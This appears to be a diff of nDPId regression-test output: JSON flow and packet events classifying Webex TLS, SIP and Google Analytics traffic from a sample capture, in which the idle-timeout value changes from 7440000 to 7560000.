00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, 
CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570638225,"flow_last_seen":1444570638225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570638225,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1444570638225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570638225,"pkt":"ABoRAAACABoRAAABCABFAAA8UR1AAEAGNzMKCAAB2DrQKKmpAbtoC5J\/AAAAAKACOQjy7gAAAgQFtAQCCAoATMNiAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1444570638234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570638234,"pkt":"ABoRAAACABoRAAABCABFAAAoAeFAABAGtoPYOtAoCggAAQG7qamX9G2AaAuSgFAS\/\/9SAQAA"} 
+01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570638225,"flow_last_seen":1444570638225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570638225,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1444570638225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570638225,"pkt":"ABoRAAACABoRAAABCABFAAA8UR1AAEAGNzMKCAAB2DrQKKmpAbtoC5J\/AAAAAKACOQjy7gAAAgQFtAQCCAoATMNiAAAAAAEDAwY="} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1444570638234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570638234,"pkt":"ABoRAAACABoRAAABCABFAAAoAeFAABAGtoPYOtAoCggAAQG7qamX9G2AaAuSgFAS\/\/9SAQAA"} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1444570638237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570638237,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1444570639260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570639260,"pkt":"ABoRAAACABoRAAABCABFAAAoUR5AAEAGN0YKCAAB2DrQKKmpAbtoC5KAl\/RtgVAQOQgY+gAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1444570639260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570639260,"pkt":"ABoRAAACABoRAAABCABFAAAoUR5AAEAGN0YKCAAB2DrQKKmpAbtoC5KAl\/RtgVAQOQgY+gAA"} 
+00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1444570639266,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570639266,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsI
E5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640269,"flow_last_seen":1444570640269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1444570640269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640269,"pkt":"ABoRAAACABoRAAABCABFAAA8fMBAAEAGd0oKCAABch3Ki7gfAbudV783AAAAAKACOQjtmQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1444570640284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAAoAfNAABAGIixyHcqLCggAAQG7uB9iqEDInVe\/OFAS\/\/+vRQAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640284,"flow_last_seen":1444570640284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640284,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1444570640284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAA8nBhAAEAGTKkKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiE1wAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1444570640298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAAoAfRAABAGFuJyHdXUCggAAQG7ox2Q5KAQbxtf8FAS\/\/+4\/gAA"} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640298,"flow_last_seen":1444570640298,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640298,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1444570640298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAA8YQlAAEAGkVsKCAABch3MMcncAbvjbaL+AAAAAKACOQiwWQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1444570640309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640309,"pkt":"ABoRAAACABoRAAABCABFAAAoAfVAABAGIIRyHcwxCggAAQG7ydwckl0B422i\/1AS\/\/+b4gAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640310,"flow_last_seen":1444570640310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640310,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1444570640310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640310,"pkt":"ABoRAAACABoRAAABCABFAAA8S45AAEAGO38KCAABQERpYpETAbtLyIh5AAAAAKACOQgv9gAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1444570640319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAAoAfZAABAGtStARGliCggAAQG7kRO0N3eGS8iIelAS\/\/9pVAAA"} 
-00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640319,"flow_last_seen":1444570640319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640319,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1444570640319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAA8c3VAAEAGE5MKCAABQERpZ6GyAbtpybCOAAAAAKACOQjZNwAAAgQFtAQCCAoATMP7AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1444570640330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAAoAfdAABAGtSVARGlnCggAAQG7obKWNk9xacmwj1AS\/\/9YsAAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640330,"flow_last_seen":1444570640330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640330,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1444570640330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAA8tGhAAEAGXWUKCAABPm3geMe+AbssX3BwAAAAAKACOQi7XAAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1444570640338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAAoAfhAABAGP+o+beB4CggAAQG7x77ToI+PLF9wcVAS\/\/+9aQAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640338,"flow_last_seen":1444570640338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640338,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 